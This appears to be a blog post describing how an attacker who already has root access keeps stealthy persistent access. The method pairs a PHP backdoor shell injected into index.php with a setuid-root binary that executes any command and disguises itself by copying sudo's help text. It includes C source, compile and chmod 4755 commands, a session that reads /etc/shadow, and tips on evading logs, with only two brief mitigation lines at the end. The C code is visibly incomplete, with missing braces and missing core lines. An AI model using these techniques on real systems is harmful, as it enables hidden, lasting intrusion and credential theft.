1. Attacker is already in and has obtained "root" privilege. His concern is to get persistent access to target with maximum stealth.

Tools of trade:
1. Hookworm php shell - Discussed here
2. Suid file - Discussed here

Contrary to our technique of reverse connect, this post covers direct connect technique.

Hookworm or any such php backdoor shell mostly run as non-root, which is the best practice and hence advisable. Such shells do not give provision for "su" and stops user(attacker in our case) changing user from something like "nobody" | "apache" to "root", even though attacker might have already cracked the shadow hash.

Persistent Access:
1. Attacker could easily inject the hookworm code in index.php for easy and stealth non-root access to target anytime.
2. Further, attacker could compile the following code (suid technique):
# include <stdio.h>
# include <string.h>

int main(int argc, char* argv[])
        char cmd[1024];
        if(argc < 2) 
                printf("usage: sudo -h | -K | -k | -L | -V\n");
                printf("usage: sudo -v [-AknS] [-p prompt]\n");
                printf("usage: sudo -l[l] [-AknS] [-g groupname|#gid] [-p prompt] [-U username] [-u username|#uid] [-g groupname|#gid] [command]\n");
                printf("usage: sudo -e [-AknS] [-C fd] [-g groupname|#gid] [-p prompt] [-u username|#uid] file ...\n");

        strcpy(cmd, " ");
        strcat(cmd, argv[1]);
Compile and setuid bit:
gcc -o suid suid.c
chmod 4755 suid
Copy the binary suid to /usr/bin and execute.

PoC Code
hookworm> id
uid=503(apache) gid=503(apache) groups=503(apache)

hookworm> suid "id"
uid=0(root) gid=503(apache) groups=503(apache)

hookworm> suid "cat /etc/shadow"
What the code does? Executes the command passed to it as root i.e. attacker could run any command on target through php back door non-root shell.
Coping the binary to /usr/bin adds it to PATH and hence can be executed from anywhere on the target.

Attacker could choose a confusing name like "suid" and include help message of some other legitimate binary (like sudo in our case). This might help it conceal itself if by mistake someone types suid instead of sudo.

Pros & Cons:
1. Could be quite stealthy. Nothing in http logs except index.php was accessed and that is legitimate.
2. Direct access, with proxy usage IP could be spoofed.
3. Nothing in history command
4. hookworm doesn't have ssl feature yet, sniffing cookies would reveal the commands traversing in them.
5. Dependency on php functions like Passthru, Exec, System, Shell_exec

1. Regularly check suid files on system
2. Harden php